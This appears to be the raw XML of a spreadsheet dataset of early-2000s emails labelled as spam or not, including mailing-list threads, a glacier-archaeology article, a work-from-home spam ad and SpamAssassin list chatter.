 &gt; &gt; ALB&gt; that the woman not only gets a man, but one in a country where both
 &gt; she and
 &gt; &gt; ALB&gt; her offspring will have actual opportunities? Oh and the lack of
 &gt; &gt; ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded" choices?
 &gt; &gt;
 &gt; &gt; Mmkay.  For the nth time Adam, we don't live in the land of
 &gt; &gt; Adam-fantasy.  Women actually are allowed to do things productive,
 &gt; &gt; independent and entirely free of their male counterparts.  They aren't
 &gt; &gt; forced to cook and clean and merely be sexual vessels.   Sometimes,
 &gt; &gt; and this will come as a shock to you, no doubt, men and women even
 &gt; &gt; find -love- (which is the crucial distinction between this system) and
 &gt; &gt; they marry one another for the satisfaction of being together.   I
 &gt; &gt; know, far-fetched and idealistically crazy as it is, but such things
 &gt; &gt; do happen.   I can guarantee you, if my mother was approached by my
 &gt; &gt; father, and 25 years ago, he commented on her cleaning ability as a
 &gt; &gt; motivator for marrying her, we would not be having this conversation
 &gt; &gt; now.
 &gt; &gt;
 &gt; &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; &gt; their opportunities for finding women _will_ be scarce.   Again, these
 &gt; &gt; situations are great, provided everyone is aware that the relationship
 &gt; &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
 &gt; &gt; doesn't have to pay, and she wants a country that isn't impoverished
 &gt; &gt; and teeming with AIDS.  A contract, versus a true love-interest
 &gt; &gt; marriage.
 &gt; &gt;
 &gt; &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
 &gt; &gt; blame law school and my cat.
 &gt; &gt;
 &gt; &gt; -BB
 &gt; &gt;
 &gt; &gt; ALB&gt; - Adam L. "Duncan" Beberg
 &gt; &gt; ALB&gt;   http://www.mithral.com/~beberg/
 &gt; &gt; ALB&gt;   beberg@mithral.com
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; 
 &gt; --
 &gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613669,159/
 Date: 2002-10-06T18:12:51+01:00
 Scripting languages allow rapid development of game behavior without the 
 pitfalls that await the unwary C++ programmer. Using an existing scripting 
 language saves the time and cost of developing a custom language, and typically 
 gives you a far more powerful language than you could create on your own. 
 Python is an excellent choice for a game scripting language because it is 
 powerful, easily embedded, can seamlessly be extended with C/C++ code
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the link - I'm fascinated by archaeology as well.
 ----- Original Message -----
 From: "James Rogers" &lt;jamesr@best.com&gt;
 To: &lt;fork@example.com&gt;
 Sent: Monday, September 23, 2002 2:48 PM
 Subject: Re: Goodbye Global Warming
 I've seen articles on this type of stuff passing through various forums
 for several years.  I've always found archaeology interesting for no
 particular reason.  Here is a recent article from U.S. News that I
 actually still have in the dank recesses of my virtual repository.
 -James Rogers
  jamesr@best.com
 --------------------------------------------
 http://www.usnews.com/usnews/issue/020916/misc/16meltdown.htm
 Defrosting the past
 Ancient human and animal remains are melting out of glaciers, a bounty
 of a warming world
 BY ALEX MARKELS
 As he hiked near Colorado's Continental Divide in the summer of 2001, Ed
 Knapp noticed a strange shape jutting from a melting ice field at 13,000
 feet. "It looked like a bison skull," the building contractor and
 amateur archaeologist recalls. "I thought, 'That's strange. Bison don't
 live this high up.' "
 Knapp brought the skull to the Denver Museum of Nature and Science,
 where scientists last month announced that it was indeed from a
 bisonone that died about 340 years ago. "This was an extraordinary
 discovery," says Russ Graham, the museum's chief curator, adding that it
 could alter notions of the mountain environment centuries ago. "There's
 probably a lot more like it yet to be found."
 And not just bison. Colorado isn't the only place where glaciers and
 snowfields are melting. Decades of unusual warmth in regions from Peru
 to Alaskaa trend some think is linked to emissions from cars and
 industryhave shrunk or thawed many of the world's 70,000 glaciers. As
 the ice recedes, a treasure-trove of human and animal artifacts is
 emerging, extraordinarily well preserved after centuries in the deep
 freeze. The fabrics, wood, bone, and DNA-rich tissue found on the mucky
 fringes of the ice are revising scientists' understanding of our
 predecessors' health, habits, and technology, and the prey they pursued.
 "It's mind-boggling how many different fields are being advanced through
 studying these remains," says Johan Reinhard, a high-altitude
 archaeologist and explorer-in-residence at the National Geographic
 Society. Rare, spectacular finds like the frozen mummies he discovered
 in the Andes of Peru in the 1990s and the legendary 5,300-year-old "Ice
 Man," found at the edge of a receding glacier in the Alps in 1991, have
 offered time capsules of cultural and biological information. Now, as
 the ice continues to retreat, it is yielding not just occasional
 treasures but long records of humans and animals in the high mountains.
 Vanishing act. The trick is finding such specimens before Mother
 Natureand looterstake them first. Once uncovered, frozen remains can
 deteriorate within hours or be gnawed by animals. Moreover, they're
 often so well preserved when they emerge that people who come upon them
 don't even realize they're ancient.
 That was the case when three men hunting sheep near a high glacier in
 British Columbia, Canada, three years ago saw what they thought was a
 dead animal. "It looked a little like sealskin buried in the ice,"
 recalls Warren Ward, a teacher from nearby Nelson. "But when I looked
 closer I could see leather fringe from a coat and finger bones."
 Figuring they had found the remains of another hunter, or perhaps a fur
 trapper, the men stowed a flint knife and other artifacts in a Zip-Loc
 bag and delivered them to local officials. Archaeologists later exhumed
 the fallen hunter's body, along with a woven hat, fur clothing, and what
 seemed to be a medicine bag. Carbon dating revealed that the hunter
 lived about 550 years ago. Dubbed Kwaday Dan Ts'inchi, or Long Ago
 Person Found, by people of the Champagne and Aishihik First Nations (who
 may be his direct descendants), he is perhaps the best-preserved human
 from the period ever found in North America.
 Other findings from melting ice in the neighboring Yukon region could
 explain what that long-ago person was doing in the mountains in the
 first place. "Before this there was no archaeological record of people
 living here," says Greg Hare, a Yukon government archaeologist. "Now we
 see that this area was very much part of people's seasonal activities."
 Like Ward's discovery, the search began by chance, when Kristin Benedek
 caught a whiff of what smelled like a barnyard as she and her husband,
 Gerry Kuzyk, hunted sheep at 6,000 feet in the mountains of the south
 Yukon. They followed the scent to a melting patch of ice covered in
 caribou dung. "It was really odd, because I knew there hadn't been
 caribou in the area for at least 100 years," recalls Kuzyk, then a
 wildlife biologist with the Yukon government.
 Caribou cake. Returning a week later, he found "what looked like a
 pencil with string wrapped around it." It turned out to be a
 4,300-year-old atlatl, or spear thrower. Further investigation of the
 ice patchand scores of others around the regionrevealed icy layer
 cakes filled with caribou remains and human detritus chronicling 7,800
 years of changing hunting practices.
 Scientists now believe ancient caribou and other animals flocked to the
 ice each summer to cool down and escape swarming mosquitoes and flies.
 Hunters followed the game. They returned for centuries and discarded
 some equipment in the ice. "We've got people hunting with throwing darts
 up until 1,200 years ago," says Hare, who now oversees the research
 project. "Then we see the first appearance of the bow and arrow about
 1,300 years ago. And by 1,200 years ago, there's no more throwing
 darts."
 Now scientists are trying to make the search less a matter of luck. They
 are developing sophisticated computer models that combine data on where
 glaciers are melting fastest and where humans and animals are known to
 have migrated to pinpoint the best places to search in Alaska's Wrangell
 and St. Elias mountain rangesthe United States' most glaciated
 terrainand in the Andes. Johan Reinhard thinks the fast- thawing
 European Alps could also deliver more findings, perhaps as exquisite as
 the Ice Man. "Global warming is providing us high-altitude
 archaeologists with some fantastic opportunities right now. We're
 probably about the only ones happy about it."
</t>
  </si>
  <si>
    <t xml:space="preserve">WE NEED HELP.  We are a 14 year old fortune 500 company, and we have 
 grown 1000%!  We cannot keep up.  We are looking for individuals who 
 want to work at home, and make a good living.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.lotsonet.com/opportunity
 and fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
 NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
 ONLY.
 http://www.lotsonet.com/opportunity
 You want to be independent?  THEN MAKE IT HAPPEN!
 HAPPEN!
 SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
 GUARANTEED!
 http://www.lotsonet.com/opportunity
 To be removed from our link simple go to:
 http://www.lotsonet.com/opportunity/remove.html
 6414pQes2-008QthF8093ahxJ6-676cumj9620Ohcr3-405taCI6431voNa4-662XWln5l65
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] CONFIDENTIAL
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-08-21 at 06:42, Craig R.Hughes wrote:
 &gt; On Tuesday, August 20, 2002, at 09:38  PM, Mike Burger wrote:
 &gt; 
 &gt; &gt; Of course, since I have this list before my SA filter, it got through.
 &gt; 
 &gt; That's exactly what they're counting on!  Actually, I think it's 
 &gt; more likely spammer humor, and sa-talk is on a list somewhere.
 &gt; 
 Oh, I dunno. Humor or not it, lets some of us with new installs test out
 SA with "real" email.
 :)
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
  <fonts count="3">
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
  </fonts>
  <fills count="2">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray"/>
    </fill>
  </fills>
  <borders count="1">
    <border/>
  </borders>
  <cellStyleXfs count="1">
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" applyAlignment="1" applyFont="1"/>
  </cellStyleXfs>
  <cellXfs count="5">
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>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www.post-gazette.com/columnists/20020905brian5.asp" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.post-gazette.com/columnists/20020905brian5.asp" TargetMode="External"/><Relationship Id="rId3"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31.5"/>
    <col customWidth="1" min="3" max="3" width="80.25"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="2" hidden="1">
      <c r="A2" s="1">
        <v>0.0</v>
      </c>
      <c r="B2" s="1" t="s">
        <v>4</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>5</v>
      </c>
      <c r="D2" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3" hidden="1">
      <c r="A3" s="1">
        <v>1.0</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>7</v>
      </c>
      <c r="D3" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="1">
        <v>2.0</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>8</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D4" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5" hidden="1">
      <c r="A5" s="1">
        <v>3.0</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>10</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D5" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6" hidden="1">
      <c r="A6" s="1">
        <v>4.0</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D6" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7" hidden="1">
      <c r="A7" s="1">
        <v>5.0</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>14</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>15</v>
      </c>
      <c r="D7" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8" hidden="1">
      <c r="A8" s="1">
        <v>6.0</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>17</v>
      </c>
      <c r="D8" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="1">
        <v>7.0</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>19</v>
      </c>
      <c r="D9" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="10" hidden="1">
      <c r="A10" s="1">
        <v>8.0</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>21</v>
      </c>
      <c r="D10" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="11" hidden="1">
      <c r="A11" s="1">
        <v>9.0</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>22</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>23</v>
      </c>
      <c r="D11" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="1">
        <v>10.0</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>25</v>
      </c>
      <c r="D12" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="13" hidden="1">
      <c r="A13" s="1">
        <v>11.0</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>27</v>
      </c>
      <c r="D13" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="14" hidden="1">
      <c r="A14" s="1">
        <v>12.0</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>28</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>29</v>
      </c>
      <c r="D14" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="15" hidden="1">
      <c r="A15" s="1">
        <v>13.0</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>31</v>
      </c>
      <c r="D15" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="1">
        <v>14.0</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>32</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>33</v>
      </c>
      <c r="D16" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="17" hidden="1">
      <c r="A17" s="1">
        <v>15.0</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>34</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>35</v>
      </c>
      <c r="D17" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="18" hidden="1">
      <c r="A18" s="1">
        <v>16.0</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>36</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>37</v>
      </c>
      <c r="D18" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="1">
        <v>17.0</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>38</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>39</v>
      </c>
      <c r="D19" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="20" hidden="1">
      <c r="A20" s="1">
        <v>18.0</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>41</v>
      </c>
      <c r="D20" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="21" hidden="1">
      <c r="A21" s="1">
        <v>19.0</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>42</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>43</v>
      </c>
      <c r="D21" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="22" hidden="1">
      <c r="A22" s="1">
        <v>20.0</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>44</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>45</v>
      </c>
      <c r="D22" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="1">
        <v>21.0</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>46</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>47</v>
      </c>
      <c r="D23" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="24" hidden="1">
      <c r="A24" s="1">
        <v>22.0</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D24" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="1">
        <v>23.0</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>50</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>51</v>
      </c>
      <c r="D25" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="26" hidden="1">
      <c r="A26" s="1">
        <v>24.0</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>52</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>53</v>
      </c>
      <c r="D26" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="27" hidden="1">
      <c r="A27" s="1">
        <v>25.0</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>54</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>55</v>
      </c>
      <c r="D27" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="28" hidden="1">
      <c r="A28" s="1">
        <v>26.0</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>57</v>
      </c>
      <c r="D28" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="29" hidden="1">
      <c r="A29" s="1">
        <v>27.0</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>58</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>59</v>
      </c>
      <c r="D29" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="30" hidden="1">
      <c r="A30" s="1">
        <v>28.0</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>60</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>61</v>
      </c>
      <c r="D30" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="1">
        <v>29.0</v>
      </c>
      <c r="B31" s="2" t="s">
        <v>62</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>63</v>
      </c>
      <c r="D31" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="32" hidden="1">
      <c r="A32" s="1">
        <v>30.0</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>65</v>
      </c>
      <c r="D32" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="33" hidden="1">
      <c r="A33" s="1">
        <v>31.0</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>66</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>67</v>
      </c>
      <c r="D33" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="34" hidden="1">
      <c r="A34" s="1">
        <v>32.0</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>68</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>69</v>
      </c>
      <c r="D34" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="1">
        <v>33.0</v>
      </c>
      <c r="B35" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>71</v>
      </c>
      <c r="D35" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="36" hidden="1">
      <c r="A36" s="1">
        <v>34.0</v>
      </c>
      <c r="B36" s="1" t="s">
        <v>72</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>73</v>
      </c>
      <c r="D36" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="1">
        <v>35.0</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>74</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>75</v>
      </c>
      <c r="D37" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="1">
        <v>36.0</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>76</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>77</v>
      </c>
      <c r="D38" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="39" hidden="1">
      <c r="A39" s="1">
        <v>37.0</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>78</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>79</v>
      </c>
      <c r="D39" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="1">
        <v>38.0</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>80</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>81</v>
      </c>
      <c r="D40" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="41" hidden="1">
      <c r="A41" s="1">
        <v>39.0</v>
      </c>
      <c r="B41" s="1" t="s">
        <v>82</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>83</v>
      </c>
      <c r="D41" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="42" hidden="1">
      <c r="A42" s="1">
        <v>40.0</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>84</v>
      </c>
      <c r="D42" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="43" hidden="1">
      <c r="A43" s="1">
        <v>41.0</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>85</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D43" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="44" hidden="1">
      <c r="A44" s="1">
        <v>42.0</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>87</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>88</v>
      </c>
      <c r="D44" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="45" hidden="1">
      <c r="A45" s="1">
        <v>43.0</v>
      </c>
      <c r="B45" s="1" t="s">
        <v>89</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>90</v>
      </c>
      <c r="D45" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="1">
        <v>44.0</v>
      </c>
      <c r="B46" s="1" t="s">
        <v>91</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>92</v>
      </c>
      <c r="D46" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="47" hidden="1">
      <c r="A47" s="1">
        <v>45.0</v>
      </c>
      <c r="B47" s="1" t="s">
        <v>93</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>94</v>
      </c>
      <c r="D47" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="48" hidden="1">
      <c r="A48" s="1">
        <v>46.0</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>95</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>96</v>
      </c>
      <c r="D48" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="49" hidden="1">
      <c r="A49" s="1">
        <v>47.0</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>97</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>98</v>
      </c>
      <c r="D49" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="50" hidden="1">
      <c r="A50" s="1">
        <v>48.0</v>
      </c>
      <c r="B50" s="1" t="s">
        <v>99</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>100</v>
      </c>
      <c r="D50" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="51" hidden="1">
      <c r="A51" s="1">
        <v>49.0</v>
      </c>
      <c r="B51" s="1" t="s">
        <v>101</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>102</v>
      </c>
      <c r="D51" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="52" hidden="1">
      <c r="A52" s="1">
        <v>50.0</v>
      </c>
      <c r="B52" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>103</v>
      </c>
      <c r="D52" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="1">
        <v>51.0</v>
      </c>
      <c r="B53" s="1" t="s">
        <v>104</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>105</v>
      </c>
      <c r="D53" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="54" hidden="1">
      <c r="A54" s="1">
        <v>52.0</v>
      </c>
      <c r="B54" s="1" t="s">
        <v>106</v>
      </c>
      <c r="C54" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D54" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="55" hidden="1">
      <c r="A55" s="1">
        <v>53.0</v>
      </c>
      <c r="B55" s="1" t="s">
        <v>108</v>
      </c>
      <c r="C55" s="1" t="s">
        <v>109</v>
      </c>
      <c r="D55" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="1">
        <v>54.0</v>
      </c>
      <c r="B56" s="1" t="s">
        <v>110</v>
      </c>
      <c r="C56" s="1" t="s">
        <v>111</v>
      </c>
      <c r="D56" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="57" hidden="1">
      <c r="A57" s="1">
        <v>55.0</v>
      </c>
      <c r="B57" s="1" t="s">
        <v>112</v>
      </c>
      <c r="C57" s="1" t="s">
        <v>113</v>
      </c>
      <c r="D57" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="58" hidden="1">
      <c r="A58" s="1">
        <v>56.0</v>
      </c>
      <c r="B58" s="1" t="s">
        <v>114</v>
      </c>
      <c r="C58" s="1" t="s">
        <v>115</v>
      </c>
      <c r="D58" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="1">
        <v>57.0</v>
      </c>
      <c r="B59" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D59" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="60" hidden="1">
      <c r="A60" s="1">
        <v>58.0</v>
      </c>
      <c r="B60" s="1" t="s">
        <v>118</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>119</v>
      </c>
      <c r="D60" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="1">
        <v>59.0</v>
      </c>
      <c r="B61" s="1" t="s">
        <v>120</v>
      </c>
      <c r="C61" s="1" t="s">
        <v>121</v>
      </c>
      <c r="D61" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="62" hidden="1">
      <c r="A62" s="1">
        <v>60.0</v>
      </c>
      <c r="B62" s="1" t="s">
        <v>122</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>123</v>
      </c>
      <c r="D62" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="63" hidden="1">
      <c r="A63" s="1">
        <v>61.0</v>
      </c>
      <c r="B63" s="1" t="s">
        <v>124</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>125</v>
      </c>
      <c r="D63" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="64" hidden="1">
      <c r="A64" s="1">
        <v>62.0</v>
      </c>
      <c r="B64" s="1" t="s">
        <v>126</v>
      </c>
      <c r="C64" s="1" t="s">
        <v>127</v>
      </c>
      <c r="D64" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="1">
        <v>63.0</v>
      </c>
      <c r="B65" s="1" t="s">
        <v>128</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>129</v>
      </c>
      <c r="D65" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="66" hidden="1">
      <c r="A66" s="1">
        <v>64.0</v>
      </c>
      <c r="B66" s="1" t="s">
        <v>130</v>
      </c>
      <c r="C66" s="1" t="s">
        <v>131</v>
      </c>
      <c r="D66" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="1">
        <v>65.0</v>
      </c>
      <c r="B67" s="1" t="s">
        <v>132</v>
      </c>
      <c r="C67" s="1" t="s">
        <v>133</v>
      </c>
      <c r="D67" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="1">
        <v>66.0</v>
      </c>
      <c r="B68" s="1" t="s">
        <v>134</v>
      </c>
      <c r="C68" s="1" t="s">
        <v>135</v>
      </c>
      <c r="D68" s="1">
        <v>1.0</v>
      </c>
    </row>
